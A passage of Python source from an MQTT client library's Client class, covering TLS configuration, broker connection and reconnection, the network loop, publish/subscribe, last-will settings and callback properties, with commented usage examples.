self._sockpairW.close()
self._sockpairW = None
def reinitialise(self, client_id="", clean_session=True, userdata=None):
self._reset_sockets()
self.__init__(client_id, clean_session, userdata)
def ws_set_options(self, path="/mqtt", headers=None):
""" Set the path and headers for a websocket connection
path is a string starting with / which should be the endpoint of the
mqtt connection on the remote server
headers can be either a dict or a callable object. If it is a dict then
the extra items in the dict are added to the websocket headers. If it is
a callable, then the default websocket headers are passed into this
function and the result is used as the new headers.
"""
self._websocket_path = path
if headers is not None:
if isinstance(headers, dict) or callable(headers):
self._websocket_extra_headers = headers
else:
raise ValueError("'headers' option to ws_set_options has to be either a dictionary or callable")
def tls_set_context(self, context=None):
"""Configure network encryption and authentication context. Enables SSL/TLS support.
context : an ssl.SSLContext object. By default this is given by
`ssl.create_default_context()`, if available.
Must be called before connect() or connect_async()."""
if self._ssl_context is not None:
raise ValueError('SSL/TLS has already been configured.')
# Assume that we have SSL support, or at least that the context input behaves like ssl.SSLContext
# in current versions of Python
if context is None:
if hasattr(ssl, 'create_default_context'):
context = ssl.create_default_context()
else:
raise ValueError('SSL/TLS context must be specified')
self._ssl = True
self._ssl_context = context
# Ensure _tls_insecure is consistent with check_hostname attribute
if hasattr(context, 'check_hostname'):
self._tls_insecure = not context.check_hostname
def tls_set(self, ca_certs=None, certfile=None, keyfile=None, cert_reqs=None, tls_version=None, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
By default, on Python 2.7.9+ or 3.4+, the default certification
authority of the system is used. On older Python versions this parameter
is mandatory.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
that if either of these files is encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if ssl is None:
raise ValueError('This platform has no SSL/TLS.')
if not hasattr(ssl, 'SSLContext'):
# Require Python version that has SSL context support in standard library
raise ValueError('Python 2.7.9 and 3.2 are the minimum supported versions for TLS.')
if ca_certs is None and not hasattr(ssl.SSLContext, 'load_default_certs'):
raise ValueError('ca_certs must not be None.')
# Create SSLContext object
if tls_version is None:
tls_version = ssl.PROTOCOL_TLSv1
# If the python version supports it, use highest TLS version automatically
if hasattr(ssl, "PROTOCOL_TLS"):
tls_version = ssl.PROTOCOL_TLS
context = ssl.SSLContext(tls_version)
# Configure context
if certfile is not None:
context.load_cert_chain(certfile, keyfile)
if cert_reqs == ssl.CERT_NONE and hasattr(context, 'check_hostname'):
context.check_hostname = False
context.verify_mode = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
else:
context.load_default_certs()
if ciphers is not None:
context.set_ciphers(ciphers)
self.tls_set_context(context)
if cert_reqs != ssl.CERT_NONE:
# Default to secure, sets context.check_hostname attribute
# if available
self.tls_insecure_set(False)
else:
# But with ssl.CERT_NONE, we can not check_hostname
self.tls_insecure_set(True)
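# Illustrative usage sketch, not part of the client implementation: enabling
# TLS with tls_set() before connecting. The broker hostname, port and CA
# bundle path are placeholders, and the module is assumed to be importable
# as paho.mqtt.client.
#
#   import paho.mqtt.client as mqtt
#
#   client = mqtt.Client(client_id="tls-example")
#   client.tls_set(ca_certs="/path/to/ca.crt")   # or omit ca_certs to use the
#                                                # system CA store on 2.7.9+/3.4+
#   client.connect("broker.example.com", 8883)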
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect() and after either tls_set() or
tls_set_context()."""
if self._ssl_context is None:
raise ValueError('Must configure SSL context before using tls_insecure_set.')
self._tls_insecure = value
# Ensure check_hostname is consistent with _tls_insecure attribute
if hasattr(self._ssl_context, 'check_hostname'):
# Rely on SSLContext to check host name
# If verify_mode is CERT_NONE then the host name will never be checked
self._ssl_context.check_hostname = not value
def enable_logger(self, logger=None):
""" Enables a logger to send log messages to """
if logger is None:
if self._logger is not None:
# Do not replace existing logger
return
logger = logging.getLogger(__name__)
self._logger = logger
def disable_logger(self):
self._logger = None
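# Illustrative usage sketch: routing the client's internal log output through
# the standard logging module with enable_logger(). The logger name is a
# placeholder and client is assumed to be an existing Client instance.
#
#   import logging
#   logging.basicConfig(level=logging.DEBUG)
#   client.enable_logger(logging.getLogger("mqtt.example"))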
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found, try "pip install dnspython" or "pip3 install dnspython3".')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state = mqtt_cs_connect_async
def reconnect_delay_set(self, min_delay=1, max_delay=120):
""" Configure the exponential reconnect delay
When connection is lost, wait initially min_delay seconds and
double this time every attempt. The wait is capped at max_delay.
Once the client is fully connected (i.e. not just the TCP socket, but a
successful CONNACK received), the wait timer is reset to min_delay.
"""
with self._reconnect_delay_mutex:
self._reconnect_min_delay = min_delay
self._reconnect_max_delay = max_delay
self._reconnect_delay = None
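# Illustrative usage sketch: relaxing the reconnect back-off so a flaky link
# retries after 2 seconds at first and never waits longer than 5 minutes.
# The values are placeholders and client is an existing Client instance.
#
#   client.reconnect_delay_set(min_delay=2, max_delay=300)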
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
with self._out_packet_mutex:
self._out_packet = collections.deque()
with self._current_out_packet_mutex:
self._current_out_packet = None
with self._msgtime_mutex:
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._ping_t = 0
self._state = mqtt_cs_new
self._sock_close()
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
if self._ssl:
# SSL is only supported when SSLContext is available (implies Python >= 2.7.9 or >= 3.2)
verify_host = not self._tls_insecure
try:
# Try with server_hostname, even if it's not supported in certain scenarios
sock = self._ssl_context.wrap_socket(
sock,
server_hostname=self._host,
do_handshake_on_connect=False,
)
except ssl.CertificateError:
# CertificateError is derived from ValueError
raise
except ValueError:
# Python version requires SNI in order to handle server_hostname, but SNI is not available
sock = self._ssl_context.wrap_socket(
sock,
do_handshake_on_connect=False,
)
else:
# If the SSL context has already checked the hostname, we don't need to do it again
if (hasattr(self._ssl_context, 'check_hostname') and
self._ssl_context.check_hostname):
verify_host = False
sock.settimeout(self._keepalive)
sock.do_handshake()
if verify_host:
ssl.match_hostname(sock.getpeercert(), self._host)
if self._transport == "websockets":
sock.settimeout(self._keepalive)
sock = WebsocketWrapper(sock, self._host, self._port, self._ssl,
self._websocket_path, self._websocket_extra_headers)
self._sock = sock
self._sock.setblocking(0)
self._registered_write = False
self._call_socket_open()
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
as soon as their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
with self._current_out_packet_mutex:
with self._out_packet_mutex:
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.popleft()
if self._current_out_packet:
wlist = [self._sock]
else:
wlist = []
# used to check if there are any bytes left in the (SSL) socket
pending_bytes = 0
if hasattr(self._sock, 'pending'):
pending_bytes = self._sock.pending()
# if bytes are pending do not wait in select
if pending_bytes > 0:
timeout = 0.0
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self._sock, self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError:
# Socket isn't the correct type; in all likelihood the connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except KeyboardInterrupt:
# Allow ^C to interrupt
raise
except:
return MQTT_ERR_UNKNOWN
if self._sock in socklist[0] or pending_bytes > 0:
rc = self.loop_read(max_packets)
if rc or self._sock is None:
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self._sock)
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self._sock in socklist[1]:
rc = self.loop_write(max_packets)
if rc or self._sock is None:
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a MQTTMessageInfo class, which can be used to determine whether
the message has been delivered (using info.is_published()) or to block
waiting for the message to be delivered (info.wait_for_publish()). The
message ID and return code of the publish() call can be found at
info.mid and info.rc.
For backwards compatibility, the MQTTMessageInfo class is iterable so
the old construct of (rc, mid) = client.publish(...) is still valid.
rc is MQTT_ERR_SUCCESS to indicate success or MQTT_ERR_NO_CONN if the
client is not currently connected. mid is the message ID for the
publish request. The mid value can be used to track the publish request
by checking against the mid argument in the on_publish() callback if it
is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic = topic.encode('utf-8')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, unicode):
local_payload = payload.encode('utf-8')
elif isinstance(payload, (bytes, bytearray)):
local_payload = payload
elif isinstance(payload, (int, float)):
local_payload = str(payload).encode('ascii')
elif payload is None:
local_payload = b''
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if len(local_payload) > 268435455:
raise ValueError('Payload too large.')
local_mid = self._mid_generate()
if qos == 0:
info = MQTTMessageInfo(local_mid)
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False, info)
info.rc = rc
return info
else:
message = MQTTMessage(local_mid, topic)
message.timestamp = time_func()
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
with self._out_message_mutex:
if self._max_queued_messages > 0 and len(self._out_messages) >= self._max_queued_messages:
message.info.rc = MQTT_ERR_QUEUE_SIZE
return message.info
if local_mid in self._out_messages:
message.info.rc = MQTT_ERR_QUEUE_SIZE
return message.info
self._out_messages[message.mid] = message
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages += 1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(message.mid, topic, message.payload, message.qos, message.retain,
message.dup)
# remove from inflight messages so it will be sent after a connection is made
if rc is MQTT_ERR_NO_CONN:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
message.info.rc = rc
return message.info
else:
message.state = mqtt_ms_queued
message.info.rc = MQTT_ERR_SUCCESS
return message.info
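# Illustrative usage sketch: publishing a QoS 1 message and blocking on the
# returned MQTTMessageInfo until delivery completes. The topic and payload
# are placeholders and client is assumed to be connected with a running
# network loop.
#
#   import paho.mqtt.client as mqtt
#
#   info = client.publish("sensors/temperature", payload="21.5", qos=1)
#   if info.rc == mqtt.MQTT_ERR_SUCCESS:
#       info.wait_for_publish()
#       print("delivered, mid =", info.mid)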
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
Requires a broker that supports MQTT v3.1.
username: The username to authenticate with. It need have no relationship to the client id. Must be unicode
[MQTT-3.1.3-11].
Set to None to reset client back to not using username/password for broker authentication.
password: The password to authenticate with. Optional, set to None if not required. If it is unicode, then it
will be encoded as UTF-8.
"""
# [MQTT-3.1.3-11] User name must be UTF-8 encoded string
self._username = None if username is None else username.encode('utf-8')
self._password = password
if isinstance(self._password, unicode):
self._password = self._password.encode('utf-8')
def enable_bridge_mode(self):
"""Sets the client in a bridge mode instead of client mode.
Must be called before connect() to have any effect.
Requires brokers that support bridge mode.
Under bridge mode, the broker will identify the client as a bridge and
not send its own messages back to it. Hence a subscription of # is
possible without message loops. This feature also correctly propagates
the retain flag on the messages.
Currently Mosquitto and RSMB support this feature. This feature can
be used to create a bridge between multiple brokers.
"""
self._client_mode = MQTT_BRIDGE
def disconnect(self):
"""Disconnect a connected client from the broker."""
self._state = mqtt_cs_disconnecting
if self._sock is None:
return MQTT_ERR_NO_CONN
return self._send_disconnect()
def subscribe(self, topic, qos=0):
"""Subscribe the client to one or more topics.
This function may be called in three different ways:
Simple string and integer
-------------------------
e.g. subscribe("my/topic", 2)
topic: A string specifying the subscription topic to subscribe to.
qos: The desired quality of service level for the subscription.
Defaults to 0.
String and integer tuple
------------------------
e.g. subscribe(("my/topic", 1))
topic: A tuple of (topic, qos). Both topic and qos must be present in
the tuple.
qos: Not used.
List of string and integer tuples
---------------------------------
e.g. subscribe([("my/topic", 0), ("another/topic", 2)])
This allows multiple topic subscriptions in a single SUBSCRIBE
command, which is more efficient than using multiple calls to
subscribe().
topic: A list of tuple of format (topic, qos). Both topic and qos must
be present in all of the tuples.
qos: Not used.
The function returns a tuple (result, mid), where result is
MQTT_ERR_SUCCESS to indicate success or (MQTT_ERR_NO_CONN, None) if the
client is not currently connected. mid is the message ID for the
subscribe request. The mid value can be used to track the subscribe
request by checking against the mid argument in the on_subscribe()
callback if it is defined.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length, or if topic is not a string, tuple or list.
"""
topic_qos_list = None
if isinstance(topic, tuple):
topic, qos = topic
if isinstance(topic, basestring):
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic_qos_list = [(topic.encode('utf-8'), qos)]
elif isinstance(topic, list):
topic_qos_list = []
for t, q in topic:
if q < 0 or q > 2:
raise ValueError('Invalid QoS level.')
if t is None or len(t) == 0 or not isinstance(t, basestring):
raise ValueError('Invalid topic.')
topic_qos_list.append((t.encode('utf-8'), q))
if topic_qos_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if any(self._filter_wildcard_len_check(topic) != MQTT_ERR_SUCCESS for topic, _ in topic_qos_list):
raise ValueError('Invalid subscription filter.')
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_subscribe(False, topic_qos_list)
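# Illustrative usage sketch: the three call forms accepted by subscribe(), as
# documented above. The topic filters are placeholders and client is assumed
# to be connected.
#
#   client.subscribe("my/topic", qos=2)                    # string and qos
#   client.subscribe(("my/topic", 1))                      # (topic, qos) tuple
#   client.subscribe([("my/topic", 0), ("another/#", 2)])  # list of tuples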
def unsubscribe(self, topic):
"""Unsubscribe the client from one or more topics.
topic: A single string, or list of strings that are the subscription
topics to unsubscribe from.
Returns a tuple (result, mid), where result is MQTT_ERR_SUCCESS
to indicate success or (MQTT_ERR_NO_CONN, None) if the client is not
currently connected.
mid is the message ID for the unsubscribe request. The mid value can be
used to track the unsubscribe request by checking against the mid
argument in the on_unsubscribe() callback if it is defined.
Raises a ValueError if topic is None or has zero string length, or is
not a string or list.
"""
topic_list = None
if topic is None:
raise ValueError('Invalid topic.')
if isinstance(topic, basestring):
if len(topic) == 0:
raise ValueError('Invalid topic.')
topic_list = [topic.encode('utf-8')]
elif isinstance(topic, list):
topic_list = []
for t in topic:
if len(t) == 0 or not isinstance(t, basestring):
raise ValueError('Invalid topic.')
topic_list.append(t.encode('utf-8'))
if topic_list is None:
raise ValueError("No topic specified, or incorrect topic type.")
if self._sock is None:
return (MQTT_ERR_NO_CONN, None)
return self._send_unsubscribe(False, topic_list)
def loop_read(self, max_packets=1):
"""Process read network events. Use in place of calling loop() if you
wish to handle your client reads as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_messages) + len(self._in_messages)
if max_packets < 1:
max_packets = 1
for _ in range(0, max_packets):
if self._sock is None:
return MQTT_ERR_NO_CONN
rc = self._packet_read()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def loop_write(self, max_packets=1):
"""Process write network events. Use in place of calling loop() if you
wish to handle your client writes as part of your own application.
Use socket() to obtain the client socket to call select() or equivalent
on.
Use want_write() to determine if there is data waiting to be written.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None:
return MQTT_ERR_NO_CONN
max_packets = len(self._out_packet) + 1
if max_packets < 1:
max_packets = 1
try:
for _ in range(0, max_packets):
rc = self._packet_write()
if rc > 0:
return self._loop_rc_handle(rc)
elif rc == MQTT_ERR_AGAIN:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
finally:
if self.want_write():
self._call_socket_register_write()
else:
self._call_socket_unregister_write()
def want_write(self):
"""Call to determine if there is network data waiting to be written.
Useful if you are calling select() yourself rather than using loop().
"""
if self._current_out_packet or len(self._out_packet) > 0:
return True
else:
return False
def loop_misc(self):
"""Process miscellaneous network events. Use in place of calling loop() if you
wish to call select() or equivalent on the client socket yourself.
Do not use if you are using the threaded interface loop_start()."""
if self._sock is None:
return MQTT_ERR_NO_CONN
now = time_func()
self._check_keepalive()
if self._last_retry_check + 1 < now:
# Only check once a second at most
self._message_retry_check()
self._last_retry_check = now
if self._ping_t > 0 and now - self._ping_t >= self._keepalive:
# self._ping_t != 0 means we are waiting for a PINGRESP.
# This hasn't happened in the keepalive time so we should disconnect.
self._sock_close()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
with self._callback_mutex:
if self.on_disconnect:
with self._in_callback_mutex:
try:
self.on_disconnect(self, self._userdata, rc)
except Exception as err:
self._easy_log(MQTT_LOG_ERR, 'Caught exception in on_disconnect: %s', err)
return MQTT_ERR_CONN_LOST
return MQTT_ERR_SUCCESS
def max_inflight_messages_set(self, inflight):
"""Set the maximum number of messages with QoS>0 that can be part way
through their network flow at once. Defaults to 20."""
if inflight < 0:
raise ValueError('Invalid inflight.')
self._max_inflight_messages = inflight
def max_queued_messages_set(self, queue_size):
"""Set the maximum number of messages in the outgoing message queue.
0 means unlimited."""
if queue_size < 0:
raise ValueError('Invalid queue size.')
if not isinstance(queue_size, int):
raise ValueError('Invalid type of queue size.')
self._max_queued_messages = queue_size
return self
def message_retry_set(self, retry):
"""Set the timeout in seconds before a message with QoS>0 is retried.
20 seconds by default."""
if retry < 0:
raise ValueError('Invalid retry.')
self._message_retry = retry
def user_data_set(self, userdata):
"""Set the user data variable passed to callbacks. May be any data type."""
self._userdata = userdata
def will_set(self, topic, payload=None, qos=0, retain=False):
"""Set a Will to be sent by the broker in case the client disconnects unexpectedly.
This must be called before connect() to have any effect.
topic: The topic that the will message should be published on.
payload: The message to send as a will. If not given, or set to None a
zero length message will be used as the will. Passing an int or float
will result in the payload being converted to a string representing
that number. If you wish to send a true int/float, use struct.pack() to
create the payload you require.
qos: The quality of service level to use for the will.
retain: If set to true, the will message will be set as the "last known
good"/retained message for the topic.
Raises a ValueError if qos is not 0, 1 or 2, or if topic is None or has
zero string length.
"""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, unicode):
self._will_payload = payload.encode('utf-8')
elif isinstance(payload, (bytes, bytearray)):
self._will_payload = payload
elif isinstance(payload, (int, float)):
self._will_payload = str(payload).encode('ascii')
elif payload is None:
self._will_payload = b""
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
self._will = True
self._will_topic = topic.encode('utf-8')
self._will_qos = qos
self._will_retain = retain
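# Illustrative usage sketch: registering a retained Last Will so subscribers
# see an "offline" status if this client disconnects unexpectedly. The topic
# and payload are placeholders; will_set() must be called before connect().
#
#   client.will_set("clients/example/status", payload="offline",
#                   qos=1, retain=True)
#   client.connect("broker.example.com", 1883)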
def will_clear(self):
""" Removes a will that was previously configured with will_set().
Must be called before connect() to have any effect."""
self._will = False
self._will_topic = b""
self._will_payload = b""
self._will_qos = 0
self._will_retain = False
def socket(self):
"""Return the socket or ssl object for this client."""
return self._sock
def loop_forever(self, timeout=1.0, max_packets=1, retry_first_connection=False):
"""This function call loop() for you in an infinite blocking loop. It
is useful for the case where you only want to run the MQTT client loop
in your program.
loop_forever() will handle reconnecting for you. If you call
disconnect() in a callback it will return.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
retry_first_connection: Should the first connection attempt be retried on failure?
Raises socket.error on first-connection failures unless retry_first_connection=True.
"""
run = True
while run:
if self._thread_terminate is True:
break
if self._state == mqtt_cs_connect_async:
try:
self.reconnect()
except (socket.error, OSError, WebsocketConnectionError):
if not retry_first_connection:
raise
self._easy_log(MQTT_LOG_DEBUG, "Connection failed, retrying")
self._reconnect_wait()
else:
break
while run:
rc = MQTT_ERR_SUCCESS
while rc == MQTT_ERR_SUCCESS:
rc = self.loop(timeout, max_packets)
# We don't need to worry about locking here, because we've
# either called loop_forever() when in single threaded mode, or
# in multi threaded mode when loop_stop() has been called and
# so no other threads can access _current_out_packet,
# _out_packet or _messages.
if (self._thread_terminate is True
and self._current_out_packet is None
and len(self._out_packet) == 0
and len(self._out_messages) == 0):
rc = 1
run = False
def should_exit():
return self._state == mqtt_cs_disconnecting or run is False or self._thread_terminate is True
if should_exit():
run = False
else:
self._reconnect_wait()
if should_exit():
run = False
else:
try:
self.reconnect()
except (socket.error, WebsocketConnectionError):
pass
return rc
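# Illustrative usage sketch: a minimal blocking client built around
# loop_forever(), combining connect_async() with the callback properties
# defined below. The broker address and topic filter are placeholders.
#
#   import paho.mqtt.client as mqtt
#
#   def on_connect(client, userdata, flags, rc):
#       client.subscribe("example/#")
#
#   def on_message(client, userdata, msg):
#       print(msg.topic, msg.payload)
#
#   client = mqtt.Client()
#   client.on_connect = on_connect
#   client.on_message = on_message
#   client.connect_async("broker.example.com", 1883, keepalive=60)
#   client.loop_forever(retry_first_connection=True)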
def loop_start(self):
"""This is part of the threaded client interface. Call this once to
start a new thread to process network traffic. This provides an
alternative to repeatedly calling loop() yourself.
"""
if self._thread is not None:
return MQTT_ERR_INVAL
self._thread_terminate = False
self._thread = threading.Thread(target=self._thread_main)
self._thread.daemon = True
self._thread.start()
def loop_stop(self, force=False):
"""This is part of the threaded client interface. Call this once to
stop the network thread previously created with loop_start(). This call
will block until the network thread finishes.
The force parameter is currently ignored.
"""
if self._thread is None:
return MQTT_ERR_INVAL
self._thread_terminate = True
if threading.current_thread() != self._thread:
self._thread.join()
self._thread = None
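# Illustrative usage sketch: the threaded interface. loop_start() spawns a
# daemon network thread so the main thread stays free; disconnect() and
# loop_stop() shut it down cleanly. The broker address and topic are
# placeholders and client is an existing Client instance.
#
#   client.connect("broker.example.com", 1883)
#   client.loop_start()
#   try:
#       client.publish("example/heartbeat", "ok", qos=1).wait_for_publish()
#   finally:
#       client.disconnect()
#       client.loop_stop()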
@property
def on_log(self):
"""If implemented, called when the client has log information.
Defined to allow debugging."""
return self._on_log
@on_log.setter
def on_log(self, func):
""" Define the logging callback implementation.
Expected signature is:
log_callback(client, userdata, level, buf)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
level: gives the severity of the message and will be one of
MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG.
buf: the message itself
"""
self._on_log = func
@property
def on_connect(self):
"""If implemented, called when the broker responds to our connection
request."""
return self._on_connect
@on_connect.setter
def on_connect(self, func):
""" Define the connect callback implementation.
Expected signature is:
connect_callback(client, userdata, flags, rc)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
flags: response flags sent by the broker
rc: the connection result
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is only useful for clients that are
using clean session set to 0. If a client with clean session=0
reconnects to a broker to which it has previously connected, this
flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc indicates success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
"""
with self._callback_mutex:
self._on_connect = func
@property
def on_subscribe(self):
"""If implemented, called when the broker responds to a subscribe
request."""
return self._on_subscribe
@on_subscribe.setter
def on_subscribe(self, func):
""" Define the suscribe callback implementation.
Expected signature is:
subscribe_callback(client, userdata, mid, granted_qos)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
mid: matches the mid variable returned from the corresponding
subscribe() call.
granted_qos: list of integers that give the QoS level the broker has
granted for each of the different subscription requests.
"""
with self._callback_mutex:
self._on_subscribe = func
@property
def on_message(self):
"""If implemented, called when a message has been received on a topic
that the client subscribes to.
This callback will be called for every message received. Use
message_callback_add() to define multiple callbacks that will be called
for specific topic filters."""
return self._on_message
@on_message.setter
def on_message(self, func):
""" Define the message received callback implementation.
Expected signature is:
on_message_callback(client, userdata, message)
client: the client instance for this callback
userdata: the private user data as set in Client() or userdata_set()
message: an instance of MQTTMessage.
This is a class with members topic, payload, qos, retain.
"""
with self._callback_mutex:
self._on_message = func
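# Illustrative usage sketch: a message callback matching the signature
# documented above. MQTTMessage exposes topic, payload, qos and retain;
# client is an existing Client instance.
#
#   def on_message(client, userdata, message):
#       print("%s qos=%d retain=%s: %r"
#             % (message.topic, message.qos, message.retain, message.payload))
#
#   client.on_message = on_message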
@property
def on_publish(self):
"""If implemented, called when a message that was to be sent using the
publish() call has completed transmission to the broker.
For messages with QoS levels 1 and 2, this means that the appropriate
